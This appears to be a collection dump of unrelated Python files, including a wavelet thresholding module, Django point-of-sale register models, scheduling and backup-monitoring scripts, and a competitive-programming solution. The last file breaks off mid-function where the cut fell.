# <https://github.com/PyWavelets/pywt>
# See COPYING for license details.
"""
The thresholding helper module implements the most popular signal thresholding
functions.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['threshold']
import numpy as np
def soft(data, value, substitute=0):
data = np.asarray(data)
magnitude = np.absolute(data)
with np.errstate(divide='ignore'):
# divide by zero okay as np.inf values get clipped, so ignore warning.
thresholded = (1 - value/magnitude)
thresholded.clip(min=0, max=None, out=thresholded)
thresholded = data * thresholded
if substitute == 0:
return thresholded
else:
cond = np.less(magnitude, value)
return np.where(cond, substitute, thresholded)
def hard(data, value, substitute=0):
data = np.asarray(data)
cond = np.less(np.absolute(data), value)
return np.where(cond, substitute, data)
def greater(data, value, substitute=0):
data = np.asarray(data)
if np.iscomplexobj(data):
raise ValueError("greater thresholding only supports real data")
return np.where(np.less(data, value), substitute, data)
def less(data, value, substitute=0):
data = np.asarray(data)
if np.iscomplexobj(data):
raise ValueError("less thresholding only supports real data")
return np.where(np.greater(data, value), substitute, data)
thresholding_options = {'soft': soft,
'hard': hard,
'greater': greater,
'less': less}
def threshold(data, value, mode='soft', substitute=0):
"""
Thresholds the input data depending on the mode argument.
In ``soft`` thresholding, data values with absolute value less than
`param` are replaced with `substitute`. Data values with absolute value
greater or equal to the thresholding value are shrunk toward zero
by `value`. In other words, the new value is
``data/np.abs(data) * np.maximum(np.abs(data) - value, 0)``.
In ``hard`` thresholding, the data values where their absolute value is
less than the value param are replaced with `substitute`. Data values with
absolute value greater or equal to the thresholding value stay untouched.
In ``greater`` thresholding, the data is replaced with `substitute` where
data is below the thresholding value. Greater data values pass untouched.
In ``less`` thresholding, the data is replaced with `substitute` where data
is above the thresholding value. Lesser data values pass untouched.
Both ``hard`` and ``soft`` thresholding also support complex-valued data.
Parameters
----------
data : array_like
Numeric data.
value : scalar
Thresholding value.
mode : {'soft', 'hard', 'greater', 'less'}
Decides the type of thresholding to be applied on input data. Default
is 'soft'.
substitute : float, optional
Substitute value (default: 0).
Returns
-------
output : array
Thresholded array.
Examples
--------
>>> import numpy as np
>>> import pywt
>>> data = np.linspace(1, 4, 7)
>>> data
array([ 1. , 1.5, 2. , 2.5, 3. , 3.5, 4. ])
>>> pywt.threshold(data, 2, 'soft')
array([ 0. , 0. , 0. , 0.5, 1. , 1.5, 2. ])
>>> pywt.threshold(data, 2, 'hard')
array([ 0. , 0. , 2. , 2.5, 3. , 3.5, 4. ])
>>> pywt.threshold(data, 2, 'greater')
array([ 0. , 0. , 2. , 2.5, 3. , 3.5, 4. ])
>>> pywt.threshold(data, 2, 'less')
array([ 1. , 1.5, 2. , 0. , 0. , 0. , 0. ])
"""
try:
return thresholding_options[mode](data, value, substitute)
except KeyError:
# Make sure error is always identical by sorting keys
keys = ("'{0}'".format(key) for key in
sorted(thresholding_options.keys()))
raise ValueError("The mode parameter only takes values from: {0}."
.format(', '.join(keys)))
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from flask_mongoengine import Document
from mongoengine import CASCADE
from mongoengine.fields import LazyReferenceField, BooleanField, StringField
from mpcontribs.api.contributions.document import Contributions
class Cards(Document):
contribution = LazyReferenceField(
Contributions,
passthrough=True,
reverse_delete_rule=CASCADE,
primary_key=True,
help_text="contribution this table belongs to",
)
is_public = BooleanField(
required=True, default=False, help_text="public or private card"
)
html = StringField(required=True, default="", help_text="embeddable html code")
meta = {"collection": "cards", "indexes": ["is_public"]}
|
nilq/baby-python
|
python
|
from collections import defaultdict
from django.conf import settings
from django.db import transaction, IntegrityError, models
from django.db.models import Q, Sum
from django.utils import timezone
from article.models import ArticleType
from money.models import Money, Decimal, Denomination, CurrencyData, Currency, MoneyField
from sales.models import TransactionLine, Transaction
from stock.models import StockChange, StockChangeSet
from stock.stocklabel import StockLabeledLine
from swipe.settings import CASH_PAYMENT_TYPE_NAME
from tools.management.commands.consistencycheck import consistency_check, CRITICAL
from tools.util import raiseif
class PaymentType(models.Model):
# Name of the payment type. "Cash" is always used when using cash registers. Should not be changed.
name = models.CharField(max_length=255, unique=True)
# Is used for invoicing. If enabled, the cost is to be used at a later date. Should not be changed.
is_invoicing = models.BooleanField(default=False)
def __str__(self):
return "{}".format(self.name)
class Register(models.Model):
"""
A register. This can be a cash register with denominations or a virtual register that accepts money
in a general sense
"""
# Name of the register. Cosmetic
class Meta:
permissions = (
# Permission to allow linking customers to users via the swipe web interface.
("open_register", "Can open a register"),
("close_register", "Can close a register"),
)
name = models.CharField(max_length=255, unique=True)
# Currency used for this register. Unchangeable
currency = models.ForeignKey(CurrencyData, on_delete=models.PROTECT)
# Indicates if register accepts cash or otherwise is a digital register
is_cash_register = models.BooleanField(default=False)
# Do we use this register right now?(Non-active registers should be empty)
is_active = models.BooleanField(default=True)
# How do people pay in this register?
payment_type = models.ForeignKey(PaymentType, on_delete=models.PROTECT)
def get_denominations(self):
# Gets denominations from register based on its currency
if self.is_cash_register:
return Denomination.objects.filter(currency=self.currency)
else:
return []
def is_open(self):
# Checks if the register is in an opened state
sales_period = SalesPeriod.objects.filter(endTime__isnull=True)
if len(sales_period) > 1:
raise IntegrityError("More than one salesperiod opened")
elif len(sales_period) == 1:
counts = RegisterCount.objects.filter(sales_period=sales_period[0], register=self)
if len(counts) == 0 or len(counts) > 1:
return False
else:
if counts[0].is_opening_count:
return True
else:
raise IntegrityError("The only count for the opened sales period is a closing count")
else:
return False
def get_prev_closing_count(self):
# Get this registers previous count when it was closed.
# This shouldn't be used for Brief Registers; they should start at zero instead.
count_exists = RegisterCount.objects.filter(is_opening_count=False, register=self).exists()
if not count_exists:
# Dummy the count
return Money(currency=Currency(self.currency.iso), amount=Decimal("0.00000"))
last_count = RegisterCount.objects.filter(is_opening_count=False,
register=self).order_by('sales_period__beginTime').last()
denoms = DenominationCount.objects.filter(register_count=last_count)
sum = None
for denom in denoms:
if not sum:
sum = denom.get_money_value()
else:
sum += denom.get_money_value()
return sum
@property
def denomination_counts(self):
if RegisterCount.objects.filter(register=self).exists():
return DenominationCount.objects.filter(register_count=RegisterCount.objects.filter(register=self).
latest('time_created'))
else:
return []
@transaction.atomic
def open(self, counted_amount, memo="", denominations=None):
# Opens a register, opens a registerperiod if neccessary
if denominations is None:
denominations = []
if memo == "":
memo = None
if self.is_active:
if self.is_open():
raise AlreadyOpenError("Register is already open")
else:
# Calculate Cash Register Difference
if self.is_cash_register:
count = None
for denomination_count in denominations:
if count is None:
count = denomination_count.get_money_value()
else:
count += denomination_count.get_money_value()
# Without denominations, the value is equal to 0
# This prevents an error when denomination count is empty
# Failure will occur however, if the opening count is non-zero as no counts means that
# there is a difference between counted_amount and denomination counts
if len(denominations) == 0:
count = Money(amount=Decimal(0), currency=Currency(self.currency.iso))
diff = count - self.get_prev_closing_count()
# Get or create SalesPeriod
if RegisterMaster.sales_period_is_open():
open_sales_period = RegisterMaster.get_open_sales_period()
else:
open_sales_period = SalesPeriod()
open_sales_period.save()
# Create cash register
if self.is_cash_register:
reg_count = RegisterCount(is_opening_count=True, register=self, sales_period=open_sales_period,
amount=counted_amount)
used_denominations = set()
for denomination_count in denominations:
counted_amount -= denomination_count.number * denomination_count.denomination.amount
used_denominations.add(denomination_count.denomination)
raiseif(counted_amount != Decimal("0.00000"),
RegisterCountError, "denominations amounts did not add up.")
reg_count.save(denominations=denominations)
for denomination_count in denominations:
denomination_count.register_count = reg_count
all_denominations = Denomination.objects.filter(currency__register=self)
for den in all_denominations:
if den not in used_denominations:
denominations.append(DenominationCount(number=0, denomination=den,
register_count=reg_count))
for denomination_count in denominations:
denomination_count.save()
else: # Create Brief Register
# Optional: Disallow opening with no value
reg_count = RegisterCount(is_opening_count=True, amount=counted_amount,
register=self, sales_period=open_sales_period)
reg_count.save()
# Set diff to zero, may change later on
if not self.is_cash_register:
diff = Money(amount=counted_amount, currency=Currency(self.currency.iso))
# Save Register Count Difference
# noinspection PyUnboundLocalVariable
OpeningCountDifference.objects.create(register_count=reg_count, difference=diff)
return reg_count
else:
raise InactiveError("The register is inactive and cannot be opened")
def close(self, indirect=False, register_count=None, denomination_counts=None):
"""
:param indirect:
:param register_count:
:type register_count: RegisterCount
:param denomination_counts:
:type denomination_counts: List[DenominationCount]
:return:
"""
# Closes a register, should always be called indirectly via registermaster
if denomination_counts is None:
denomination_counts = []
if not indirect:
raise InvalidOperationError("You can only close a register when the entire sales period is closed")
else:
if not self.is_open():
raise AlreadyClosedError("Register is already closed")
else:
# Opened register means opened sales period
opened_sales_period = SalesPeriod.get_opened_sales_period()
reg_count = RegisterCount.objects.filter(register=self, sales_period=opened_sales_period)
if len(reg_count) > 1:
raise IntegrityError("Register is either opened twice or already closed.")
elif len(reg_count) == 0:
raise IntegrityError("Register is apparantly not opened but function indicated that it was.")
else:
register_count.sales_period = opened_sales_period
if register_count.register_id != self.id:
raise InvalidInputError("Registercount's register does not match register")
if register_count.is_opening_count:
raise InvalidInputError("Registercount should be closing and connected to salesperiod")
if not self.is_cash_register:
for denom in denomination_counts:
raiseif(denom.denomination.currency_id != self.currency_id, InvalidInputError,
"Denomination does not have correct currency")
raiseif(denom.register_count.register_id != self.id, InvalidInputError,
"Denominationcount and register don't match")
register_count.save()
for denom in denomination_counts:
denom.register_count = register_count
denom.save()
def save(self, **kwargs):
if self.is_cash_register:
raiseif(self.payment_type.name != CASH_PAYMENT_TYPE_NAME, CurrencyTypeMismatchError,
"Payment type name did not match the provided preset. Use {} instead".format(
CASH_PAYMENT_TYPE_NAME))
super(Register, self).save()
def __str__(self):
return "Name: {}, Currency: {}, is_cash_register: {}, is_active: {}, Payment Method: {}".\
format(self.name, self.currency.name, self.is_cash_register, self.is_active, self.payment_type.name)
class RegisterMaster:
"""
A helper class that can do the necessary checks to see the state of the registers. Also, some commands can be given
"""
@staticmethod
def sales_period_is_open():
return RegisterMaster.get_open_sales_period()
@staticmethod
def get_open_sales_period():
try:
a = SalesPeriod.objects.get(endTime__isnull=True)
except SalesPeriod.DoesNotExist:
return False
return a
@staticmethod
def number_of_open_registers():
# Retrieves the number of open registers, 0 when period is closed and error when inconsistent
return RegisterCount.objects.filter(sales_period__endTime__isnull=True, is_opening_count=True).count()
@staticmethod
def get_open_registers():
# Returns all open registers
return Register.objects.filter(registercount__sales_period__endTime__isnull=True,
registercount__is_opening_count=True).distinct()
@staticmethod
def get_payment_types_for_open_registers():
# Returns the set of payment types that are possible in the open register period
return PaymentType.objects.filter(register__registercount__sales_period__endTime__isnull=True,
register__registercount__is_opening_count=True).distinct()
@staticmethod
def get_last_closed_register_counts():
# Very inefficient. If you can do this better, please do
is_open = RegisterMaster.sales_period_is_open()
closed_register_counts = []
if not is_open:
closed_registers = Register.objects.all()
else:
open_regs = RegisterMaster.get_open_registers()
closed_registers = set(Register.objects.all())
for open in open_regs:
closed_registers.remove(open)
for register in closed_registers:
counts = RegisterCount.objects.filter(register=register,
is_opening_count=False)
if len(counts) > 0:
closed_register_counts.append(counts.latest('time_created'))
closed_register_counts_ids = []
for reg in closed_register_counts:
closed_register_counts_ids.append(reg.id)
return RegisterCount.objects.filter(id__in=closed_register_counts_ids)
@staticmethod
# Gets the last register count for each register, dummied for registers without counts
def get_last_register_counts():
registers = Register.objects.all()
counts = []
for register in registers:
count_exists = RegisterCount.objects.filter(register=register).exists()
if count_exists:
counts.append(RegisterCount.objects.filter(register=register).latest('time_created'))
else:
counts.append(RegisterCount(register=register, sales_period_id=-1, is_opening_count=False,
amount=Decimal("0"),
time_created=timezone.now()))
return counts # type: List[RegisterCount]
class ConsistencyChecker:
"""
Checks the consistency of the system. Will raise IntegrityErrors if the system is an inconsistent state.
Fixes are required if any of these tests fail
"""
# This test runs the tests, but rather than raising an error it appends the errors to an array
@staticmethod
@consistency_check
def non_crashing_full_check():
errors = []
try:
ConsistencyChecker.check_open_sales_periods()
except IntegrityError:
errors.append({
"text": "More than one sales period is open",
"location": "SalesPeriods",
"line": -1,
"severity": CRITICAL
})
try:
ConsistencyChecker.check_open_register_counts()
except IntegrityError:
errors.append({
"text": "Register has more register counts opened in an opened sales period than possible",
"location": "SalesPeriods",
"line": -1,
"severity": CRITICAL
})
try:
ConsistencyChecker.check_payment_types()
except IntegrityError:
errors.append({
"text": "Cash register can only have cash as payment method",
"location": "SalesPeriods",
"line": -1,
"severity": CRITICAL
})
return errors
@staticmethod
def full_check():
ConsistencyChecker.check_open_sales_periods()
ConsistencyChecker.check_open_register_counts()
ConsistencyChecker.check_payment_types()
@staticmethod
def check_open_sales_periods():
# Checks if there is either one or zero open sales periods
active_salesperiods = SalesPeriod.objects.filter(endTime__isnull=True)
if len(active_salesperiods) > 1:
raise IntegrityError("More than one sales period is open")
@staticmethod
def check_open_register_counts():
# Checks if register is opened at most once
relevant_register_counts = RegisterCount.objects.filter(sales_period__endTime__isnull=True)
a = set()
for count in relevant_register_counts:
if count.register_id in a:
raise IntegrityError("Register is opened and closed while Sales period is still open")
else:
a.add(count.register_id)
@staticmethod
def check_payment_types():
# Checks for valid payment types. Currently it checks if cash register only hold cash
registers = Register.objects.all()
for register in registers:
if register.is_cash_register and register.payment_type.name != settings.CASH_PAYMENT_TYPE_NAME:
raise IntegrityError("Cash register can only have cash as payment method")
class SalesPeriod(models.Model):
"""
A general period in which transactions on opened registers can take place
"""
# When does the sales period start?
beginTime = models.DateTimeField(auto_now_add=True)
# When does the sales period end?(null indicates not ended)
endTime = models.DateTimeField(null=True)
# Any relevant information a user wants to add?
closing_memo = models.CharField(max_length=255, default=None, null=True)
@classmethod
def create(cls, *args, **kwargs):
return cls(*args, **kwargs)
def is_opened(self):
return not self.endTime
@staticmethod
def get_opened_sales_period():
"""
Gets the opened salesperiod. If there is none or there are multiple, Django will throw an exception.
:return:
"""
return SalesPeriod.objects.get(endTime__isnull=True)
@staticmethod
@transaction.atomic
def close(
registercounts_denominationcounts,
memo: str=None):
"""
Closes a sales period by closing all the opened registers. Requires the totals to be filled in.
:param registercounts_denominationcounts:
:type registercounts_denominationcounts: list[tuple[RegisterCount, list[DenominationCount]]]
:param memo:
:return:
"""
# early return when register is closed
if not RegisterMaster.sales_period_is_open():
return [AlreadyClosedError("Salesperiod is already closed")]
if not memo:
memo = None # ensure memo is None when None or "" or otherwise empty string
open_registers = set(RegisterMaster.get_open_registers())
unchecked = set(open_registers)
errors = []
totals = defaultdict(lambda: Decimal(0))
for (registercount, denominationcounts) in registercounts_denominationcounts:
registercount.is_opening_count = False
amount = registercount.amount
register = registercount.register
# let's already add the counted amount to the currency so that we don't have to do that later on
totals[register.currency.iso] += amount
if register.is_cash_register:
# check if denominations have valid amounts
if not denominationcounts:
errors.append(InvalidDenominationList(
"Register {} should have denomination counts attached, but doesn't.".format(register.name)
))
break
denom_amount = Decimal(0)
for denom_count in denominationcounts:
if denom_count.number < 0:
errors.append(NegativeCountError(
"Register {} has an invalid denomination count for {}{}".format(
register.name,
denom_count.denomination.currency,
denom_count.denomination.amount,
)
))
break
denom_count.register_count = registercount
denom_amount += denom_count.get_money_value().amount
if denom_amount != amount:
errors.append(InvalidDenominationList("List not equal to expected count: {}, count: {}. "
"Result: {}".format(denominationcounts,
registercount, denom_amount)))
break
# now that we're done with checking the register's data, we can pop the register from the list.
if register in unchecked:
unchecked.remove(register)
else:
errors.append(InvalidOperationError("Register {} is not available in the list of "
"unchecked registers.".format(register.name)))
if errors:
raise SalesPeriodCloseError(errors=errors)
if len(unchecked) > 0:
return [InvalidOperationError("There are some uncounted registers, please count them")]
sales_period = RegisterMaster.get_open_sales_period()
tlines = TransactionLine.objects.filter(transaction__salesperiod=sales_period)
for tline in tlines:
totals[tline.price.currency.iso] -= tline.price.amount
in_outs = MoneyInOut.objects.filter(sales_period=sales_period).select_related('register__currency')
for in_out in in_outs:
totals[in_out.register.currency.iso] -= in_out.amount
for (registercount, denom_counts) in registercounts_denominationcounts:
register = registercount.register # type: Register
register.close(indirect=True, register_count=registercount, denomination_counts=denom_counts)
for diff in totals:
close = ClosingCountDifference(sales_period=sales_period,
difference=Money(currency=Currency(diff), amount=totals[diff]))
close.save()
sales_period.endTime = timezone.now()
sales_period.save()
return sales_period
def __str__(self):
return "Begin time: {}, End time: {}".format(self.beginTime, self.endTime)
class RegisterCount(models.Model):
"""
The amount of currency and perhaps the denomination in the case of a cash register is stored here
"""
# A register period has one or two counts
register = models.ForeignKey(Register, on_delete=models.PROTECT)
# The salesperiod of the count
sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
# Indicates if this the opening or the closing count
is_opening_count = models.BooleanField()
# How much money is there at the moment of counting?
amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=-1.0)
# Time at which the registercount was created(otherwise it's really to hard to find the latest one)
time_created = models.DateTimeField(auto_now_add=True, null=True)
def save(self, *args, **kwargs):
denominations = []
if 'denominations' in kwargs:
denominations = kwargs['denominations']
if self.register.is_cash_register:
# Put all denominations for currency in a hashmap
denoms_for_register = Denomination.objects.filter(currency=self.register.currency)
all_denoms = {}
for denom in denoms_for_register:
all_denoms[str(denom.amount)] = 1
# For all denominationcounts
for denom_count in denominations:
# Assert every denomination is available exactly once
if all_denoms.pop(str(denom_count.denomination.amount), 0) == 0:
raise InvalidDenominationList("Denominations invalid (Unexpected Denom): GOT {}, EXPECTED {}. "
"Crashed at {} || {}".format(denominations, denoms_for_register,
denom_count.denomination.amount,
all_denoms))
else:
raiseif(denominations, RegisterInconsistencyError, "non-cash registers should not have denominations")
super().save()
@classmethod
def create(cls, *args, **kwargs):
return cls(*args, **kwargs)
def is_cash_register_count(self):
return self.register.is_cash_register
def get_amount_from_denominationcounts(self):
# Distills an amount value from the denomination counts
denom_counts = DenominationCount.objects.filter(register_count=self)
if len(denom_counts) > 0:
amount = Decimal(0)
for count in denom_counts:
amount += count.get_money_value()
return amount
else:
return Decimal(0)
def __str__(self):
return "Register:{}, is_opening_count:{}, Amount:{}".\
format(self.register_id, self.is_opening_count, self.amount)
class DenominationCount(models.Model):
"""
Counting of the denominations in a cash register
"""
# Every cash register count needs to count all of its denominations, amongst which is 'self'
register_count = models.ForeignKey(RegisterCount, on_delete=models.PROTECT)
# Denomination belonging to the currency of this register
denomination = models.ForeignKey(Denomination, on_delete=models.PROTECT)
# Number of pieces of denomination
number = models.IntegerField()
def get_money_value(self):
return Money(self.denomination.amount, Currency(self.denomination.currency.iso)) * int(self.number)
@classmethod
def create(cls, *args, **kwargs):
return cls(*args, **kwargs)
def __str__(self):
return "{} {} x {} @ RegCount {}".format(self.denomination.currency, self.denomination.amount, self.number,
self.register_count_id)
class MoneyInOut(models.Model):
"""
Adds money to a register during an open register period
"""
# Register to which
register = models.ForeignKey(Register, on_delete=models.PROTECT)
# Salesperiod where in/out took place
sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
# Positive: ADD, negative: REMOVE moneys
amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=0.0)
def __str__(self):
return "Register:{}, Sales Period: {}, Amount:{}".format(self.register_id, self.sales_period_id, self.amount)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
if not self.id:
if not hasattr(self, 'sales_period') or not self.sales_period:
self.sales_period = SalesPeriod.get_opened_sales_period()
super(MoneyInOut, self).save()
else:
super(MoneyInOut, self).save()
class SalesPeriodDifference(models.Model):
"""
Resolves differences between expected amounts of money in the combined opened registers and the actual
amount of money. Count is per type of money
"""
# Period in which there is a difference
sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
# Currency of the difference
currency_data = models.ForeignKey(CurrencyData, on_delete=models.PROTECT)
# Amount of difference
amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=0.0)
class OpeningCountDifference(models.Model):
# Difference that can occur when a register is opened. This indicated that money (dis)appeared between closing and
# opening of the register.
difference = MoneyField()
register_count = models.OneToOneField("RegisterCount", on_delete=models.PROTECT)
def __str__(self):
return "[{}] : {}".format(self.register_count, self.difference)
class ClosingCountDifference(models.Model):
# Difference that can occur when a sales period closes. Since this could have any reason, it cannot be pointed to
# a single register. This makes it different from an OpeningCountDifference
difference = MoneyField()
sales_period = models.ForeignKey("SalesPeriod", on_delete=models.PROTECT)
class InactiveError(Exception):
pass
class AlreadyOpenError(Exception):
pass
class AlreadyClosedError(Exception):
pass
class InvalidOperationError(Exception):
pass
class InvalidDenominationList(Exception):
pass
class InvalidRegisterError(Exception):
pass
class CurrencyTypeMismatchError(Exception):
pass
class NegativeCountError(Exception):
pass
class RegisterCountError(Exception):
pass
class RegisterInconsistencyError(Exception):
pass
class InvalidInputError(Exception):
pass
class SalesPeriodCloseError(Exception):
def __init__(self, errors):
super(SalesPeriodCloseError, self).__init__()
self.errors = errors
def __str__(self):
ret = ""
for error in self.errors:
ret += str(error)
return ret
|
nilq/baby-python
|
python
|
import threading
from functools import wraps
def delay(delay=0.):
"""
Decorator delaying the execution of a function for a while.
"""
def wrap(f):
@wraps(f)
def delayed(*args, **kwargs):
timer = threading.Timer(delay, f, args=args, kwargs=kwargs)
timer.start()
return delayed
return wrap
|
nilq/baby-python
|
python
|
train_imgs_path="path_to_train_images"
test_imgs_path="path_to_val/test images"
dnt_names=[]
import os
with open("dont_include_to_train.txt","r") as dnt:
for name in dnt:
dnt_names.append(name.strip("\n").strip(".json"))
dnt.close()
print(dnt_names)
with open("baseline_train.txt","w") as btr:
for file in os.listdir(train_imgs_path):
if file not in dnt_names:
btr.write(train_imgs_path+file+"\n")
btr.close()
with open("baseline_val.txt","w") as bv:
for file in os.listdir(test_imgs_path):
bv.write(test_imgs_path+file+"\n")
bv.close()
|
nilq/baby-python
|
python
|
import datetime
import time
import pandas as pd
from apscheduler.schedulers.background import BackgroundScheduler
from django_apscheduler.jobstores import DjangoJobStore, register_events, register_job
from django_apscheduler.models import DjangoJob, DjangoJobExecution
# from django_pandas.io import read_frame
from BiSheServer.settings import BASE_LOG_DIR, LOG_SUFFIX
from api import upload_log
# 开启定时工作,每日任务,定时执行
scheduler_plan = BackgroundScheduler() # 实例化调度器
try:
# 清除原有任务
dje = DjangoJobExecution.objects.all()
dj = DjangoJob.objects.all()
# 判断是否存在该任务
dj_rs = dj.filter(id="task_time")
if dj_rs.exists():
dj_rs = dj_rs.first()
# 如果启动时已过任务的下一次执行时间,则立即启动上传
if int(time.mktime(dj_rs.next_run_time.timetuple())) < int(time.time()):
upload_log.upload_hadoop_log_thread(suffix=(dj_rs.next_run_time + datetime.timedelta(days=-1))
.strftime(LOG_SUFFIX))
djePd = pd.DataFrame(list(dje.values()))
djPd = pd.DataFrame(list(dj.values()))
if not djePd.empty:
# 如果有执行记录,则将执行记录进行记录到文件后再清空表
crontab_log_path = BASE_LOG_DIR + "/crontab.log"
djPd.to_csv(crontab_log_path, mode='a', index=True, sep='\t', encoding='utf_8_sig')
with open(crontab_log_path, "a") as f:
f.write("\n") # 自带文件关闭功能,不需要再写f.close()
djePd.to_csv(crontab_log_path, mode='a', index=True, sep='\t', encoding='utf_8_sig')
with open(crontab_log_path, "a") as f:
f.write("\n\n") # 自带文件关闭功能,不需要再写f.close()
dje.delete()
dj.delete()
# 任务表清空完毕后,重新设置任务
# 调度器使用DjangoJobStore()
scheduler_plan.add_jobstore(DjangoJobStore(), "default")
# 设置定时任务,选择方式为interval,时间间隔为15 minutes
# 'cron'方式循环,周一到周五,每天9:30:10执行,id为工作ID作为标记
# 另一种方式为周一到周五固定时间执行任务,对应代码为:
# @register_job(scheduler_plan, "interval", minutes=15)
# @register_job(scheduler_plan, 'cron', day_of_week='mon-sun', hour='20', minute='3', second='1', id='task_time')
# @register_job(scheduler_plan, "interval", minutes=1, replace_existing=True)
@register_job(scheduler_plan, 'cron', day_of_week='mon-sun', hour='0', minute='1', second='1', id='task_time',
replace_existing=True)
def my_job():
# 这里写你要执行的任务
upload_log.upload_hadoop_log_thread(suffix="")
# pass
register_events(scheduler_plan)
scheduler_plan.start()
except Exception as e:
print(e)
# 有错误就停止定时器
scheduler_plan.shutdown()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""monitorTasks"""
# usage: ./monitorTasks.py -v ve2 -u admin -j 54334 -k 'Starting directory differ' -t 120
# import pyhesity wrapper module
from pyhesity import *
from time import sleep
from datetime import datetime
import os
import smtplib
import email.message
import email.utils
# command line arguments
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--vip', type=str, required=True) # cluster to connect to
parser.add_argument('-u', '--username', type=str, required=True) # username
parser.add_argument('-d', '--domain', type=str, default='local') # (optional) domain - defaults to local
parser.add_argument('-j', '--jobid', type=int, required=True) # job ID to monitor
parser.add_argument('-n', '--jobname', type=str, required=True) # string to find in pulse log
parser.add_argument('-k', '--keystring', type=str, required=True) # string to find in pulse log
parser.add_argument('-o', '--timeoutsec', type=int, required=True) # seconds until we alert and bailout
parser.add_argument('-c', '--callbackuser', type=str, required=True) # user@target to run callback script
parser.add_argument('-b', '--callbackpath', type=str, required=True) # user@target to run callback script
parser.add_argument('-s', '--mailserver', type=str)
parser.add_argument('-p', '--mailport', type=int, default=25)
parser.add_argument('-t', '--sendto', action='append', type=str)
parser.add_argument('-f', '--sendfrom', type=str)
args = parser.parse_args()
vip = args.vip
username = args.username
domain = args.domain
jobid = args.jobid
jobname = args.jobname
keystring = args.keystring
timeoutsec = args.timeoutsec
callbackuser = args.callbackuser
callbackpath = args.callbackpath
mailserver = args.mailserver
mailport = args.mailport
sendto = args.sendto
sendfrom = args.sendfrom
# authenticate
apiauth(vip, username, domain)
# track seconds passed
s = 0
# count tasks where preprocess is finished
x = 0
preprocessFinished = True
# new job run startTime should be in the last 60 seconds
now = datetime.now()
nowUsecs = dateToUsecs(now.strftime("%Y-%m-%d %H:%M:%S"))
startTimeUsecs = nowUsecs - 60000000
# get latest job run
run = None
print("waiting for new run...")
while run is None and s < timeoutsec:
try:
run = api('get', 'protectionRuns?jobId=%s&numRuns=1&startTimeUsecs=%s' % (jobid, startTimeUsecs))[0]
runStartTimeUsecs = run['backupRun']['stats']['startTimeUsecs']
# create a flag file for this run so we only run once
if not os.path.exists(str(runStartTimeUsecs)):
f = open(str(runStartTimeUsecs), 'w')
f.write(str(runStartTimeUsecs))
f.close()
else:
exit()
stats = run['backupRun']['sourceBackupStatus']
if run:
print("found new run")
except Exception as e:
run = None
sleep(1)
s += 1
# wait until all tasks are finished preprocessing
print("monitoring tasks...")
while x < len(run['backupRun']['sourceBackupStatus']) and s < timeoutsec:
sleep(1)
s += 1
if s > timeoutsec:
break
x = 0
for source in run['backupRun']['sourceBackupStatus']:
# get task monitor per source
task = api('get', '/progressMonitors?taskPathVec=%s' % source['progressMonitorTaskPath'])
try:
# get pulse log messages
eventmsgs = task['resultGroupVec'][0]['taskVec'][0]['progress']['eventVec']
foundkeystring = False
# check for key string in event messages
for eventmsg in eventmsgs:
if keystring in eventmsg['eventMsg']:
foundkeystring = True
if foundkeystring is True:
x += 1
else:
preprocessFinished = False
except Exception as e:
pass
if x >= len(run['backupRun']['sourceBackupStatus']):
# we're good
print('preprocessing complete')
else:
# we timed out - send an alert email
print('we timed out')
print('Sending report to %s...' % ', '.join(sendto))
msg = email.message.Message()
msg['Subject'] = "thaw timeout %s" % jobname
msg['From'] = sendfrom
msg['To'] = ','.join(sendto)
msg.add_header('Content-Type', 'text')
msg.set_payload("thaw timeout %s" % jobname)
smtpserver = smtplib.SMTP(mailserver, mailport)
smtpserver.sendmail(sendfrom, sendto, msg.as_string())
smtpserver.quit()
# regardless - call the thaw script
os.system("ssh -t %s %s" % (callbackuser, callbackpath))
|
nilq/baby-python
|
python
|
from graphite_feeder.handler.appliance.socket import energy_guard, presence
|
nilq/baby-python
|
python
|
# https://atcoder.jp/contests/abc077/tasks/arc084_a
N = int(input())
a_arr = list(map(int, input().split()))
a_arr.sort()
b_arr = list(map(int, input().split()))
c_arr = list(map(int, input().split()))
c_arr.sort()
def find_least_idx(num: int, lst: list) -> int:
n = len(lst)
left = 0
right = n - 1
while left < right:
mid = (left + right) // 2
if lst[mid] > num:
right = mid
continue
left = mid + 1
return right
def find_most_idx(num: int, lst: list) -> int:
n = len(lst)
left = 0
right = n - 1
while left < right:
mid = (left + right) // 2 + 1
if lst[mid] < num:
left = mid
continue
right = mid - 1
return left
total = 0
for b in b_arr:
if a_arr[0] >= b:
continue
if c_arr[N - 1] <= b:
continue
a_most = find_most_idx(b, a_arr)
c_least = find_least_idx(b, c_arr)
total += (a_most + 1) * (N - c_least)
print(total)
|
nilq/baby-python
|
python
|
from refiner.generic.refiner import Refiner
from topology.communication import Communication
from topology.node import Node, Direction
from topology.microToscaTypes import NodeType, RelationshipProperty
from topology.protocols import IP
import ipaddress
import copy
class DynamicDiscoveryRecognizer(Refiner):
def __init__(self):
pass
@classmethod
def recognize(cls, nodes: dict, args: dict):
for nodeName, node in nodes.items():
if node.getType() is NodeType.MICROTOSCA_NODES_MESSAGE_ROUTER:
continue
edges = node.getEdges(Direction.OUTGOING)
for adjacentName in edges.keys():
if nodes[adjacentName].getType() is NodeType.MICROTOSCA_NODES_MESSAGE_ROUTER or not node.getIsMicroToscaEdge(adjacentName):
continue
communications = node.getCommunications(adjacentName)
ipAddress = ''
for communication in communications:
protocol = communication.getNetworkLayer()
actualIP = ''
if 'ip' in protocol and nodeName == protocol['ip'].getSenderHost():
assert adjacentName == protocol['ip'].getReceiverHost()
actualIP = copy.deepcopy(str(protocol['ip'].getReceiverIP()))
elif 'ip' in protocol and nodeName == protocol['ip'].getReceiverHost():
assert adjacentName == protocol['ip'].getSenderHost()
actualIP = copy.deepcopy(str(protocol['ip'].getSenderIP()))
if ipAddress == '':
ipAddress = actualIP
elif actualIP and actualIP != ipAddress:
